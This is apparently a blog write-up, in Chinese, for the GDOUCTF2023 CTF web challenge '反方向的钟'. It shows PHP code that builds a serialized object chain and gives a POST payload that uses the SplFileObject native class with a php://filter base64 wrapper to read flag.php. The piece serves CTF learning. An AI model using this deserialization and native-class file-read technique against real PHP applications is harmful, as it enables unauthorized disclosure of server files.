GDOUCTF2023-反方向的钟-wp

题目链接

简单反序列化 关键在于怎么通过echo new $_POST['a']($_POST['b']); 来获取flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
// flag.php
class teacher{
    public $name;
    public $rank;
    public function __construct($name,$rank){
        $this->name = $name;
        $this->rank = $rank;
    }
}

class classroom{
    public $name;
    public $leader;  
    public function __construct($name,$leader){
        $this->name = $name;
        $this->leader = $leader;
    }
}

class school{
    public $department;
    public $headmaster;
    public function __construct($department,$ceo){
        $this->department = $department;
        $this->headmaster = $ceo;
    }
}

$c = new teacher('ing', 'department');
$b = new classroom('one class', $c);
$a = new school($b, 'ong');

print_r(base64_encode(serialize($a)));

这里要利用到php原生类 SplFileObject,可以读取文件内容,但只能输出一行 没办法输出flag

需要结合php伪协议

1
a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php

php原生类可参考:https://johnfrod.top/%E5%AE%89%E5%85%A8/ctf-%E4%B8%AD-php%E5%8E%9F%E7%94%9F%E7%B1%BB%E7%9A%84%E5%88%A9%E7%94%A8/

本博客采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议(CC BY-NC-SA 4.0) 发布.
⬆︎TOP